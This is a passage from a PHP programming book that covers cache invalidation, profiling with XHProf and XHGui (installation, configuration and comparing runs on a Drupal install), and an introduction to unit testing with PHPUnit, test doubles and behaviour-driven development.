return $this->memcache->delete($this->addNamespace($key,➥
$partition));
}
}
The rule of thumb for caches is to figure out the maximum possible time data can
live in the cache, and try to make sure it does. By partitioning our cache, we can
clear it for sections of our application cache quickly, easily, and without affecting
other items in it.
Depending on your needs, a lag time between data being modified and data being
invalidated in the cache may be acceptable; in this case, simple timeouts (say, five
minutes) may suffice.
Generally, it’s preferable to set the cache to an infinite timeout and then only clear
it on writes. This ensures that an item is cached for as long as is possible, but is also
immediately updated.
Profiling
ProfilingSo you’ve done all the caching and query optimizations, and removed all
the system bottlenecks, but your code is still running too slow. Now you have to
face the music and admit that, actually, your code isn’t perfect and could be im-
Performance
proved. But you already did the best you could … so, now what? This is where
profiling comes in.
is the act of taking accurate time and/or memory measurements for every action
your code performs. This is then explored to determine where the bottlenecks lie.
There are two tools for profiling that are commonly used:
1. The tried-and-tested Xdebug6 extension written by Derick Rethans, with
KCachegrind7 or QCachegrind8 to review the results.
2. Newcomer XHProf9, from the folks at Facebook, with the XHGui web front end
written by Paul Reinheimer.
Xdebug is a fantastic tool that provides the most insight into your code. It does,
however, come with too much overhead, so is typically best avoided in a production
environment; furthermore, KCachegrind/QCachegrind work poorly on Mac OS X
or Windows. There’s a web front end called webcachegrind, but it fails to provide
anywhere near the functionality of the desktop tools, nor XHGui. Additionally,
comparing two unique profiles can be a tricky task.
On the other hand, XHProf is a tool developed for use in production environments.
Facebook has noted that it profiles hits randomly in production to assess performance
on an ongoing basis. With the addition of XHGui, you can very easily compare
multiple runs, even several months apart.
Installing XHProf
XHProf is available as a PECL extension; however, the latest package (at least) won’t
install with the standard pecl install xhprof. Instead, we can install it by hand.
First, fetch the package (you can download this in your browser, too, if you’d like!)
and unpack it:
6
http://xdebug.org/
http://kcachegrind.sourceforge.net/html/Home.html
8
http://kcachegrind.sourceforge.net/html/Home.html
9
http://pecl.php.net/package/xhprof
7
227
228
PHP Master: Write Cutting-edge Code
$ wget http://pecl.php.net/get/xhprof-0.9.2.tgz
$ tar –zxvf xhprof-0.9.2.tgz
Next, change to the extension subdirectory; this is where we’ll compile the extension:
$ cd xhprof-0.9.2/extension
To compile a shared extension (either one that’s included with the main PHP distribution or one from PECL), you must first run the phpize command. This sets up
the extension for compilation against your current PHP version.
Then you’ll run ./configure, make, and make install, just like with any normal
source compilation:
$ ./configure --enable-xhprof
$ make
$ make install
Now enable the extension in your php.ini file:
[xhprof]
extension=xhprof.so
xhprof.output_dir="/tmp/xhprof"
Once this is done, you’ll want to restart your web server.
Now that we have the extension installed, let’s use it. For this, we return to the
unpacked code directory, and this time pull out the xhprof_html and xhprof_lib
directories. Move both directories to your DocumentRoot.
Next, we need to create two files to wrap our code. We’ll use PHP’s auto_prepend_file and auto_append_file to automatically wrap our code with these files.
The first file we’ll call header.php:
Performance
chapter_06/header.php
// Only run if the xhprof extension is enabled
if (extension_loaded('xhprof')) {
// Include the xhprof classes
include_once '/path/to/xhprof_lib/utils/xhprof_lib.php';
include_once '/path/to/xhprof_lib/utils/xhprof_runs.php';
// Start the profiler capturing CPU and Memory data.
xhprof_enable(XHPROF_FLAGS_CPU + XHPROF_FLAGS_MEMORY);
}
We’ll call the second file footer.php:
chapter_06/footer.php
if (extension_loaded('xhprof')) {
$ns = 'myapp'; // namespace for your application
// Turn off the profiler
$xhprof_data = xhprof_disable();
// Instantiate the class to save our run
$xhprof_runs = new XHProfRuns_Default();
// Save the run
$run_id = $xhprof_runs->save_run($xhprof_data, $ns);
// url to the XHProf UI libraries
$url = 'http://example.org/xhprof_html/index.php';
$url .= '?run=%s&source=%s';
// Replace the placeholders
$url = sprintf($url, $run_id, $ns);
// Display the URL
echo "<a href='$url' target='_new'>Profiler Output</a>";
}
Finally, add the following to your php.ini:
auto_prepend_file = /path/to/xhprof_lib/header.php
auto_append_file = /path/to/xhprof_lib/footer.php
Or, add this to your .htaccess file:
229
230
PHP Master: Write Cutting-edge Code
php_value auto_prepend_file /path/to/xhprof_lib/header.php
php_value auto_append_file /path/to/xhrprof_lib/footer.php
Once you’ve done this (and if necessary, restarted your web server), you’ll see a
link at the bottom of every page to the xhprof.profile output. Clicking this link
will reveal a page similar to Figure 6.10.
Figure 6.10. The XHProf user interface
This page gives an overview of the profile, including the amount of wall time (actual
time) and memory usage, as well as the total number of functions called. This is
followed by a list of the top 100 function calls; by default, they’re in the order they
are called.
Each row includes the following:
■ Function Name: the name of the function
■ Calls: how many times the function was called
■ Incl. Wall Time: the amount of wall time that passed from when the function was
called to when it completed, including any subfunctions called
■ Excl. Wall Time: the wall time used, excluding subfunctions
■ Incl. CPU: the amount of CPU time used, including any subfunctions called
Performance
■ Excl. CPU: the amount of CPU time used, excluding subfunctions
■ Incl. MemUse: the amount of memory used, including any subfunctions called
■ Excl. MemUse: the amount of memory used, excluding subfunctions
■ Incl. PeakMemUse: the peak amount of memory used during the execution of the
function
■ Excl. PeakMemUse: the peak amount of memory used, excluding subfunctions
You can change the ordering by clicking on the column headers; for example, to
find the slowest function (without including subfunction calls) click on the Excl.
Wall Time (microsec) column header.
Clicking on a function call will give you the call stack for that function call—this
tells you what called the function, and what it called directly (that is, no grandchild
function calls), and provides all the same metrics as the list above. This allows you
to examine why a function is taking as long as it is, and to see what makes up the
difference between inclusive and exclusive metrics. Take a look at Figure 6.11.
Figure 6.11. This report gives us a list of parent/children calls
If you wish to see this in a graphical format, click on the View Callgraph link, which
will render along the lines of Figure 6.12.
231
232
PHP Master: Write Cutting-edge Code
Figure 6.12. Drupal’s callgraph, highlighting the slowest sections
The graph highlights the slowest sections in the large box at the top of the image.
Another great feature available is the ability to compare runs. To do this, simply
change the URL to include a run1 and run2 argument:
http://example.org/xhprof_html/index.php?run1=4e6d84dfc53d8&➥
run2=4e6d88603003d&source=myapp
In addition to the default UI that ships with XHProf, there’s another tool that attempts
to improve upon it, giving a nicer interface and easier access to metrics. While the
XHGui project is still in its infancy, it can already provide some great information.
Installing XHGui
XHGui is available from GitHub—simply check it out, and place it somewhere appropriate to be included as part of your project (more on this below):
$ git clone git://github.com/preinheimer/xhprof.git
Once you have this cloned, you’ll need to set up the DB adapter, unless you’re using
MySQLi. This is done by either symlinking (on Unix-like operating systems) or
moving the file (Windows). We’ll be using MySQLi for our examples:
Performance
$ cd xhprof/xhprof_lib/utils
$ rm xhprof_runs.php
$ ln –s xhprof_runs_mysql.php xhprof_runs.php
Now create a database and install the default schema:
CREATE TABLE `details` (
`id` char(17) NOT NULL,
`url` varchar(255) default NULL,
`c_url` varchar(255) default NULL,
`timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on➥
update CURRENT_TIMESTAMP,
`server name` varchar(64) default NULL,
`perfdata` MEDIUMBLOB,
`type` tinyint(4) default NULL,
`cookie` BLOB,
`post` BLOB,
`get` BLOB,
`pmu` int(11) default NULL,
`wt` int(11) default NULL,
`cpu` int(11) default NULL,
`server_id` char(3) NOT NULL default 't11',
`aggregateCalls_include` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `url` (`url`),
KEY `c_url` (`c_url`),
KEY `cpu` (`cpu`),
KEY `wt` (`wt`),
KEY `pmu` (`pmu`),
KEY `timestamp` (`timestamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
Next, we need to set up our database credentials:
$ cd .. # back up to xhprof_lib
$ cp config.sample.php config.php
Edit the new config.php filename, and input all the settings indicated:
// Change these:
$_xhprof['dbhost'] = 'localhost';
$_xhprof['dbuser'] = 'username';
$_xhprof['dbpass'] = 'password';
233
234
PHP Master: Write Cutting-edge Code
$_xhprof['dbname'] = 'xhprof';
$_xhprof['servername'] = 'myserver';
$_xhprof['namespace'] = 'myapp';
$_xhprof['url'] = 'http://url/to/xhprof/xhprof_html';
The last three variables set a name for the specific server on which the profiling is
done. The first allows you to identify single machines in a cluster; the next is a
namespace for a specific application, allowing you to profile multiple applications
within one XHGui installation; and the last setting is the URL to a VirtualHost,
whose DocumentRoot is set to the xhprof_html directory in our XHGui source folder:
<VirtualHost *:80>
ServerName xhprof.local
DocumentRoot /path/to/xhprof/xhprof_html
</VirtualHost>
Once you have set up the VirtualHost, you can then test the setup by visiting the
site. It should look as in Figure 6.13.
Figure 6.13. The XHGui interface is a fairly straightforward layout
While this interface is simplistic, there is lots of functionality available here. Along
the top is the ability to filter by server (this is where the servername configuration
option comes into play), by domain name (so you can see requests for the same
domain even across multiple servers), and to search for requests.
Below that, you can change the number of runs you see; observe which URLs have
had the most requests, used the most CPU and RAM, or taken the longest on the
current day; or monitor activity in the last seven days.
Now that we have XHProf working, let’s put it to work. XHGui again uses the
auto_prepend_file and auto_append_file settings to wrap your requests in code,
which turns on the profiling and stores it in the database for later retrieval via the
Performance
XHGui interface. It is recommended to add this to the VirtualHost of the site you
wish to profile:
<VirtualHost *:80>
ServerName drupal.local
DocumentRoot /Library/WebServer/Documents/drupal
php_admin_value auto_prepend_file /path/to/xhprof/external/➥
header.php
php_admin_value auto_append_file /path/to/xhprof/external/➥
footer.php
</VirtualHost>
To initiate your first profile run, append _profile=1 to the URL you wish to profile.
Doing so will set a cookie and forward you to the requested page. The cookie will
persist until you pass _profile=0 instead.
To demonstrate, we’ll profile a fresh install of Drupal. This gives us a sufficiently
complex system on which to review our findings, and one whose performance
profile will be similar to a good proportion of profiles you’ll see.
Choosing to profile the main page will add a single profile run to the XHGui database,
as shown in Figure 6.14.
Figure 6.14. Adding a single profile to the XHGui database
Each run shows the time it was executed, alongside a key used for comparisons
(more on that later), the overall CPU time, Wall Time (the real passage of time; that
is, the time that would have passed were you counting the seconds using a clock
on the wall), Peak Memory Usage, and two URLs—the actual URL, as well as the
Simplified URL.
XHGui allows you to define a “urlSimilartor,” a function that can consolidate URLs
that use the same code with different arguments. For example: /edit.php?id=1 and
/edit.php?id=2 are probably calling the same code; by understanding the id is a
235
236
PHP Master: Write Cutting-edge Code
variable, we can compare two runs against distinct data more easily. This “similar”
URL is show in the Simplified URL column.
Most of XHGui is geared towards to comparing multiple runs, as profiling information is more useful in the aggregate, especially when trying to actually measure how
changes affect performance over time.
Clicking on the Timestamp will take you through the full profile for that single run.
The first chunk of data here is given over to aggregate data for both the exact URL
and the similar URL (in our case, they’re the same as we have no urlSimilartor set
up). The result is illustrated in Figure 6.15.
Figure 6.15. The full profile for a single run as shown by the Timestamp link
At the bottom of this table is an input for another run key against which to compare
the current one (we’ll look at this later).
The next section of the interface is all about our request, the cookies and their values,
the GET (and if applicable, POST) arguments, and a simple pie chart; the latter provides
us with a broad overview of what time was spent running which functions, as shown
in Figure 6.16.
Performance
Figure 6.16. Results from the request, including cookies, GET and POST arguments
You’ll notice that the number one item in the pie chart is Loading. This is a special
group that encompasses include, include_once, require, and require_once. Because this is effectively disk I/O, we can see that by simply turning on our bytecode
cache we can potentially improve our performance significantly. We’ll try this first.
Below this is the final section, illustrated in Figure 6.17.
Figure 6.17. The list of function calls performed
Here we can see a list of the function calls performed during the request. Each row
contains the following (you’ll recognize these as friendly alternatives to the standard
UI):
237
238
PHP Master: Write Cutting-edge Code
This list is sortable by any column; it’s a good idea to quickly check the Call Count
column, in case you’re accidentally calling an element many more times than expected. For example, we once found out we were checking for POST input during
the save of data being introduced via CSV import; it was calling our input test
functions almost 30,000 times.
Clicking on any of the function names takes you to the function Parent/Child Call
Report for that function, just like in the standard UI.
Now that we’ve seen the main parts of XHGui, let’s try to improve our speed by
enabling the APC cache, and see what XHGui can show us. This can be performed
with either GUI; however, for its ease of use, we’ll go with XHGui, despite its infancy.
If we look again at our list of runs, we see our original request at the bottom; the
next request is the first request with APC enabled; the topmost is the first request
after APC has cached the opcodes.
The amount of resources used by APC to perform the initial cache is quite significant,
using almost 35% more CPU time and taking at least five times longer by the wall
clock. However, once the request is cached, the impact of the APC is immediately
seen—CPU usage is down by two-thirds and wall time is more than halved, as seen
in Figure 6.18.
Figure 6.18. The impact of the APC once a request is cached
By clicking on the URL or simplified URL, we can also see these on a graph, in
Figure 6.19.
Performance
Figure 6.19. Wall time and peak memory usage represented graphically
So, now that we have our three runs, lets compare them. First, click through to our
original request (you’ll want to do this in a new tab, or copy the request IDs for the
other requests to a scratch pad first).
Then, we plug the second request’s ID into the Perform Delta input box at the bottom
of the aggregate information table. This brings us to the Delta Review page. This page
has two major components: the top part comprises the request details for the first
and second runs on either side of the Delta Difference table. This table is the most
informative part of the page. The results are shown in Figure 6.20.
Figure 6.20. Differences between first and second runs tabulated
239
240
PHP Master: Write Cutting-edge Code
This section is followed by the Function Call list, which shows the delta difference
between the two runs for each function. In this case, the only difference is the resource usage—the requests call the exact same number of function calls.
Now let’s compare our first and third requests. Take a look at Figure 6.21.
Figure 6.21. Differences between our first and third runs
This time the number of function calls has decreased, and the difference is dramatic—60% faster. The difference in function calls is due to optimizations made by
APC. So, our result is what we expected; now let’s confirm the reason. Simply click
through the run details, as shown in Figure 6.22.
Figure 6.22. A pie chart of our request details shows the dramatic difference in function calls
Performance
Not unsurprisingly, Loading now occupies a much smaller slice of our pie. Perfect!
Obviously, with a stock Drupal install there’s little going on, so optimizing beyond
this point would be rather pointless; however, now you can see the process of determining where the slowdowns are in your code, and how to measure changes.
The biggest key when trying to make performance adjustments: change one thing
at a time. Given how easy it is to measure and compare before and after, there really
is no excuse for ignoring this rule!
Profiling with XHProf can be quite fun, and finding and fixing big performance issues
is a great experience. Additionally, you can really get a feel for how your application
runs—how much spaghetti is there really? Profiling and digging through the results
is the mark of a good developer, and doing it often can put you firmly on the path
to being a great developer.
Summary
You can target many parts of an application for performance issues. In most cases,
however, you’ll find that you’ll spend more time performing one database query
than executing hundreds of lines of PHP code. Profiling will help guide you, directing
you to where you should focus the majority of your efforts.
By tackling the largest performance slowdowns first, you stand to gain better overall
improvement. If an SQL query takes 10 seconds and you speed it up by 50%, you
have saved yourself five seconds; however, if a PHP function takes one second, and
you spend the same amount of time to save that same 50%, you’ve only saved half
a second. Unfortunately, we can only do so much. At some point, you will reach
the absolute limits of the hardware, and in our experience it’s more likely to be disk
or network I/O than CPU or RAM. That’s when you need to start scaling across
multiple machines.
PHP, with its shared-nothing architecture (that is, no persistence between requests
unless you actively create it using sessions and some sort of storage) naturally scales
very well. Yet the topic of scaling is very complex, and really warrants a book of
its own to cover it properly. Still, with the lessons learned in this chapter, you
should be well on your way to streamlining the performance of your applications.
241
Chapter
7
Automated Testing
Few useful web applications have a trivial design; most have a set of “moving parts”
that are integrated to form the end product. As the functionality and features of a
product change, so does its definition of intended or correct behavior. The purpose
of automated testing is to assure that an application’s intended behavior and its
actual behavior are consistent over its lifetime.
There are several types of testing, each targeting a specific aspect of an application.
This chapter will introduce you to each type of test, as well as the software and
processes needed to implement them in your own projects.
Unit Testing
The first step in testing an application is to ensure that its individual components
behave correctly, a practice called unit testing. Without unit tests, isolating the
cause of incorrect behavior in the application as a whole can be substantially more
difficult.
Unit tests are typically developed using a unit testing framework, which provides
the infrastructure needed to write and run tests, and to output the results. Some of
244
PHP Master: Write Cutting-edge Code
the more commonly used unit testing frameworks include PHPUnit,1 SimpleTest,2
and PHPT.3
PHPUnit is the de facto standard for most projects, and implements many of the
same features and concepts present in other frameworks; as such, it will be used
for unit testing examples for the duration of this chapter. Not all unit testing
frameworks require knowledge of object oriented programming, but most do;
PHPUnit is no exception. If you’re yet to become familiar with the concepts behind
object oriented programming, head back to Chapter 1 to familiarize yourself.
Installing PHPUnit
The preferred method of installing PHPUnit is using the PEAR installer. For information on installing PEAR packages, see Appendix A. Installation instructions for
the PHPUnit PEAR package can be found at http://pear.phpunit.de.4 Both processes
are fairly well-documented, so they’ll not be reiterated here. For the rest of this
section, we’ll assume you have a functioning PHPUnit installation, and that your
PEAR installation path is present in your PHP include path.5
Writing Test Cases
Test cases are classes that contain logic to test other classes. In the case of PHPUnit,
test case classes extend the PHPUnit_Framework_TestCase class or a subclass of it.
Conventionally, most projects include a tests subdirectory within the root project
directory. If file paths within this directory correspond directly to those in the
project’s main source code directory, it can be easier to navigate. For example, if a
class Vendor_Group_Class is contained in the file lib/Vendor/Group/Class.php, the
corresponding test class might be located at tests/Vendor/Group/ClassTest.php. Ideally,
class naming should comply with PEAR naming conventions6—more on why later
in the chapter.
Here’s an example class that requires testing:
1
http://phpunit.de
http://www.simpletest.org/
3
http://qa.php.net/write-test.php
4
http://pear.phpunit.de
5
http://php.net/manual/en/ini.core.php#ini.include-path
6
http://pear.php.net/manual/en/standards.naming.php
2
Automated Testing
chapter_07/lib/Calculator.php
class My_Calculator
{
public function add($a, $b)
{
return $a + $b;
}
}
The corresponding test case might look like this:
chapter_07/tests/CalculatorTest.php
class My_CalculatorTest extends PHPUnit_Framework_TestCase
{
private $calculator;
protected function setUp()
{
$this->calculator = new My_Calculator();
}
protected function tearDown()
{
unset($this->calculator);
}
public function testAddBothPositive()
{
$result = $this->calculator->add(3, 2);
$this->assertEquals(5, $result);
}
public function testAddPositiveAndZero()
{
$result = $this->calculator->add(2, 0);
$this->assertEquals(2, $result);
}
public function testAddPositiveAndNegative()
{
$result = $this->calculator->add(-1, 1);
245
246
PHP Master: Write Cutting-edge Code
$this->assertEquals(0, $result);
}
}
For each method in this class that has a name prefixed with test, PHPUnit will
perform the following process:
1. Create an instance of this class.
2. Execute the setUp() method to perform any necessary initialization before running
the test.
3. Execute the relevant test() method to execute the actual testing logic.
4. Execute the tearDown() method to perform any necessary cleanup.
Note that declaring the setUp() and tearDown() methods in your test cases is optional, because PHPUnit_Framework_TestCase defines empty methods that are executed if you don’t override them.
Testing logic consists of assertions, checks against state to confirm that logic being
tested has the intended effect. Assertion methods in PHPUnit,7 such as the previous
assertEquals() method, are provided by PHPUnit_Framework_Assert, the parent
class of PHPUnit_Framework_TestCase.
The advantage of using these specialized assertion methods over, for example, PHP’s
native assert() function8 is that they provide more information when expected
and actual states differ. Keep this in mind when you need to make an assertion, and
try to choose the most specific assertion method for your particular use case. In
more complex or domain-specific cases, it may even make sense to write your own
assertion methods.
Running Tests
Tests are run using the PHPUnit command line runner included in its PEAR package,
phpunit. It’s invoked from the command line this way:
7
http://www.phpunit.de/manual/current/en/writing-tests-for-phpunit.html#writing-tests-for-phpunit.assertions
8
http://php.net/assert
Automated Testing
phpunit My_CalculatorTest My/CalculatorTest.php
Remember the mention of complying with PEAR naming standards in the previous
section? phpunit will attempt to derive it from the class name based on those
naming conventions if no filepath is specified. Since this example complies with
those conventions, the following example is the equivalent to the previous one:
phpunit My_CalculatorTest
phpunit has a number of useful configuration options. Here are a few examples:
--bootstrap <file>
phpunit will include the PHP file specified by this option
before executing test suites. It’s useful for including
autoloaders and other initialization logic that must live
in the global scope.
-d key[=value]
This enables a PHP configuration flag (for example, -d
9
file_uploads ), or sets the value of a PHP configuration
setting (for example, -d memory_limit=128M10). It can be
specified multiple times to set multiple options.
--filter <pattern>
This filters what test methods are run from the specified
class by name or regular expression. It’s particularly useful
for running individual test methods while creating or
modifying them.
If you use several of these, their default values can be changed using a PHPUnit
configuration file,11 either by creating a file named phpunit.xml in the current
working directory or referencing a file via a path passed to the -c option of phpunit.
Here’s what a basic configuration file looks like:
chapter_07/tests/phpunit.xml
<phpunit backupGlobals="true"
backupStaticAttributes="false"
<!--bootstrap="/path/to/bootstrap.php"-->
9
http://php.net/manual/en/ini.core.php#ini.file-uploads
http://php.net/manual/en/ini.core.php#ini.memory-limit
11
http://www.phpunit.de/manual/current/en/appendixes.configuration.html
10
247
248
PHP Master: Write Cutting-edge Code
colors="false"
convertErrorsToExceptions="true"
convertNoticesToExceptions="true"
convertWarningsToExceptions="true"
forceCoversAnnotation="false"
mapTestClassNameToCoveredClassName="false"
processIsolation="false"
stopOnError="false"
stopOnFailure="false"
stopOnIncomplete="false"
stopOnSkipped="false"
syntaxCheck="false"
testSuiteLoaderClass="PHPUnit_Runner_➥
StandardTestSuiteLoader"
<!--testSuiteLoaderFile="/path/to/➥
StandardTestSuiteLoader.php"-->
strict="false"
verbose="false">
<!-- ⋮ -->
</phpunit>
When phpunit is run, it displays a progress indicator revealing how many test
methods have been executed and what the results were. Once all test methods have
been run, it displays additional information on which tests failed and which assertions caused them to fail. If the + was changed to – in the earlier My_Calculator
example, the phpunit output might look like this:
$ phpunit My/CalculatorTest.php
PHPUnit 3.5.13 by Sebastian Bergmann.
F.F
Time: 0 seconds, Memory: 6.25Mb
There were 2 failures:
1) My_CalculatorTest::testAddBothPositive
Failed asserting that <integer:1> matches expected <integer:5>.
My/CalculatorTest.php:19
2) My_CalculatorTest::testAddPositiveAndNegative
Failed asserting that <integer:-2> matches expected <integer:0>.
Automated Testing
My/CalculatorTest.php:29
FAILURES!
Tests: 3, Assertions: 3, Failures: 2.
If the Xdebug extension12 is installed (see the section called “Profiling” in Chapter 6)
and the --coverage-html option is specified with a directory path, a code coverage
report13 is created in that directory in HTML format. The generated index.html file
provides a summary and navigation to other report sections. This report shows for
each tested class the number of times each line of code is executed by the test case.
Ideally, all classes in your project will have all lines executed at least once—this is
called 100% coverage—though keep in mind that this doesn’t necessarily mean that
unit tests fully cover your code.14
Test Doubles
Few useful applications have components that operate completely independently
from one another. Most have a set of simple independent classes that are used together by other dependent classes. Here’s an example of a dependent class that uses
the earlier independent calculator class to calculate a total:
chapter_07/lib/Totaller.php
require_once dirname(__FILE__) . '/Calculator.php';
class My_Totaller
{
private $calculator = null;
private $operands = array();
public function getCalculator()
{
if (empty($this->calculator)) {
$this->calculator = new My_Calculator;
}
return $this->calculator;
12
http://xdebug.org/
http://www.phpunit.de/manual/current/en/code-coverage-analysis.html
14
http://sebastian-bergmann.de/archives/913-Towards-Better-Code-Coverage-Metrics-in-the-PHPWorld.html
13
249
250
PHP Master: Write Cutting-edge Code
}
public function setCalculator(My_Calculator $calculator)
{
$this->calculator = $calculator;
}
public function addOperand($operand)
{
$this->operands[] = $operand;
}
public function calculateTotal()
{
$calculator = $this->getCalculator();
$total = 0;
foreach ($this->operands as $operand) {
$total = $calculator->add($total, $operand);
}
return $total;
}
}
As stated, the purpose of unit testing is to test components in isolation from one
another. So how can unit tests be written for dependent classes?
Test doubles15 are objects that can be used in place of dependencies. PHPUnit
supports creating these with the getMock() method of the
PHPUnit_Framework_TestCase class. This method has one required parameter: the
name of the class for which to generate a test double. The object returned by
getMock() is an instance of a dynamically created subclass of the original class.
Because of that, it can be used in place of an instance of that class and override any
of its methods not declared with the final, private, and static keywords. Let’s
look at an example:
chapter_07/tests/TotallerTest.php
require_once '../lib/Totaller.php';
class My_TotallerTest extends PHPUnit_Framework_TestCase
15
http://www.phpunit.de/manual/current/en/test-doubles.html
Automated Testing
{
private $calculator;
private $totaller;
protected function setUp()
{
$this->calculator = $this->getMock('My_Calculator');
$this->totaller = new My_Totaller;
$this->totaller->setCalculator($this->calculator);
}
public function testCalculateTotal()
{
$this->calculator
->expects($this->at(0))
->method('add')
->with(0, 1)
->will($this->returnValue(1));
$this->calculator
->expects($this->at(1))
->method('add')
->with(1, 2)
->will($this->returnValue(3));
$this->calculator
->expects($this->at(2))
->method('add')
->with(3, 3)
->will($this->returnValue(6));
$this->totaller->addOperand(1);
$this->totaller->addOperand(2);
$this->totaller->addOperand(3);
$this->assertEquals(6, $this->totaller->calculateTotal());
}
}
In setUp(), a test double for the My_Calculator class is created and injected into
an instance of My_Totaller using its setCalculator() method. Later, when
testCalculateTotal() calls the calculateTotal() method of My_Totaller, that
method makes an internal call to getCalculator(), which returns the test double.
By default, all methods of a test double will simply return null unless other logic
is defined. The process of defining this logic is referred to as stubbing or, in cases
where the logic includes verifying expectations such as a method being called with
251
252
PHP Master: Write Cutting-edge Code
specific parameter values, mocking. To support this, PHPUnit provides a fluent
interface—see the section called “Fluent Interfaces” in Chapter 1 if you’re yet to be
familiar with these.
The expects() method call on the My_Calculator test double accepts a matcher,
which is an object that represents an expectation regarding a method call. For
expects(), that expectation is either how many times a method will be executed
or a reference to a specific invocation of a method. In the latter case, the purpose
of referring to a specific invocation is to allow other expectations for it to be specified
further down the call chain. PHPUnit_Framework_TestCase includes convenient
shorthand methods for obtaining matchers. Methods that return matchers appropriate
for use with expects() are documented in the PHPUnit manual.16
The next call in the chain is to the method() method, which merely specifies the
method of the test double that’s being mocked. Following this is the with() method
call, which is optional and used to implement constraints on parameter values.
Each parameter passed to with() corresponds to the parameter in the same position
of the mocked method, and can be either a matcher or a scalar value. Passing a
scalar value is the equivalent to passing that value wrapped in a call to $this>equalTo() (defined in PHPUnit_Framework_Assert), which returns a matcher that
checks for equivalence to the specified value. Other appropriate matchers for with()
are documented in the PHPUnit manual.17
Finally, the will() method call is used to specify the result of the method call,
which in this case is to return a given value indicated by the call to $this->returnValue(). Alternatives include returning different values for a sequence of consecutive
calls using $this->onConsecutiveCalls(), returning the value of one of the parameters passed in the original method call using $this->returnArgument(), or
throwing a given Exception instance using $this->throwException(). These are
documented in the PHPUnit manual section on stubs.18 The possibility of exceptions
being thrown during interactions with external systems such as database servers is
one that is often neglected in tests. As stated by Netflix in a blog post19 regarding
16
http://www.phpunit.de/manual/current/en/test-doubles.html#test-doubles.mock-objects.tables.matchers
http://www.phpunit.de/manual/current/en/writing-tests-for-phpunit.html#writing-tests-for-phpunit.assertions.assertThat.tables.constraints
18
http://www.phpunit.de/manual/current/en/test-doubles.html#test-doubles.stubs
19
http://techblog.netflix.com/2010/12/5-lessons-weve-learned-using-aws.html
17
Automated Testing
lessons its team learned in using AWS, “the best way to avoid failure is to fail consistently.” Keep this point in mind as you write your own tests.
This chain of method calls in the example is used to indicate the parameter values
that are expected for each invocation of the add() method on the My_Calculator
test double and the return value that’s expected. Though the original implementation
of this method is fairly simple in this case, it could hypothetically be significantly
more complex in other examples. This illustrates a major value of test doubles: the
ability to reduce potentially complex logic into a series of expectations for parameter
and return values. The other major value is that tests for My_Totaller operate independently of My_Calculator; if the latter changes, the former is unaffected.
For some use cases, PHPUnit’s implementation of test doubles can be limited.
Other frameworks have surfaced to fill this gap, two in particular being Phake20
and Mockery.21 If you find yourself in a situation where the native functionality
provided by PHPUnit seems insufficient, these alternatives are definitely worth
exploring.
Writing Testable Code
Many common problems with writing code that’s easy to test can be avoided by
following two simple principles.
The first is to avoid writing methods that can’t be stubbed; that is, methods declared
with any of the final, private, and static keywords. Units of code that call such
methods cannot be tested independently from them, making it more difficult to
isolate the cause of an issue.
The second is to always allow dependencies to be injected (for more on dependency
injection, see the section called “Dependency Injection” in Chapter 4). The reasoning
for this principle is the same: if a dependency is hard-coded, the class using it can
no longer be tested independently from that dependency, rendering unit tests less
useful in locating unexpected behavior.
A methodology that is very conducive to writing testable code is test-driven development, often abbreviated to TDD. This process involves writing tests for code before
20
21
https://github.com/mlively/Phake
https://github.com/padraic/mockery
253
254
PHP Master: Write Cutting-edge Code
writing the actual code being tested, running the tests to verify that they fail, and
then writing code to make the tests pass. The advantages of this are twofold: first,
tests need to be written, as opposed to potentially being excluded from the project
due to tight deadlines or other complications; second, tests force you to use the API
of the code being tested, which can help to expose design or testability issues early
on.
A related methodology is behavior-driven development or BDD, which extends
TDD by having test cases (or specifications, as they’re referred to in BDD) written
in a natural language understandable by non-developers. PHPUnit ships with a
Story extension22 that adds support for BDD-style testing, which is used in the BDD
example that follows. Alternative options for PHP BDD testing frameworks include
Behat23 and PHPSpec.24
The idea behind BDD specifications is to describe how code is supposed to behave
using a domain-specific language25 or DSL appropriate for the domain or subject
area associated with the code being tested. Each specification contains three parts:
a context, an event, and an outcome. When displayed, a specification is formatted
like so:
Given: [context]
And: [another context]
When: [event]
And: [another event]
Then: [outcome]
And: [another outcome]
Each line in this output is referred to as a step. And steps are merely repetitions of
the previous type of step with a different value. Each potential value for a context,
event, and outcome must be programmatically defined. These definitions only need
to be expressed once to be usable multiple times, which is a major advantage to this
style of development. Let’s look at an example:
22
http://www.phpunit.de/manual/current/en/behaviour-driven-development.html
http://behat.org/
24
http://www.phpspec.net/
25
http://en.wikipedia.org/wiki/Domain-specific_language
23
Automated Testing
chapter_07/tests/TotallerBehavioralTest.php (excerpt)
class My_TotallerBehavioralTest extends➥
PHPUnit_Extensions_Story_TestCase
{
public function runGiven(&$world, $action, $arguments)
{
switch ($action)
{
case 'New totaller':
$world['calculator'] = $this->getMock('My_Calculator');
$world['calculator']
->expects($this->any())
->method('add')
->will($this->returnCallback(array($this,➥
'calculatorAdd')));
$world['totaller'] = new My_Totaller();
$world['totaller']->setCalculator($world['calculator']);
break;
default:
return $this->notImplemented($action);
}
}
public function calculatorAdd($a, $b)
{
static $sums = array(
'0+2' => 2,
'0+-1' => -1,
'2+3' => 5,
'2+0' => 2,
'-1+1' => 0,
);
$eqn = $a+$b;
if (isset($sums[$eqn]))
{
return $sums[$eqn];
}
$this->fail("No known output for calculator inputs:".➥
$a . ", " . $b);
}
public function runWhen(&$world, $action, $arguments)
255
256
PHP Master: Write Cutting-edge Code
{
switch ($action)
{
case 'Totaller receives operand':
$world['totaller']->addOperand($arguments[0]);
break;
default:
return $this->notImplemented($action);
}
}
public function runThen(&$world, $action, $arguments)
{
switch ($action)
{
case 'Total should be':
$this->assertEquals($arguments[0],➥
$world['totaller']->calculateTotal());
break;
default:
return $this->notImplemented($action);
}
}
// ⋮
}
Support for context, event, and outcome values are implemented in runGiven(),
runWhen(), and runThen(), respectively. Each of these methods accepts three
parameters:
1. $world is passed by reference and is used as a state container across all steps of
a given scenario, since they don’t deal with state directly
2. $action is the supplied value for the context, event, or outcome
3. $arguments is an array of arguments associated with this specific use of $action
runGiven() should handle reinitializing $world to a known state for the events that
are about to be executed. runWhen() should execute those events on the state represented in $world. Finally, runThen() should apply assertions to ensure that $world
is in the expected state following the execution of the events.
Automated Testing
Let’s look at an example of scenarios:
chapter_07/tests/TotallerBehavioralTest.php (excerpt)
class My_TotallerBehavioralTest extends➥
PHPUnit_Extensions_Story_TestCase
{
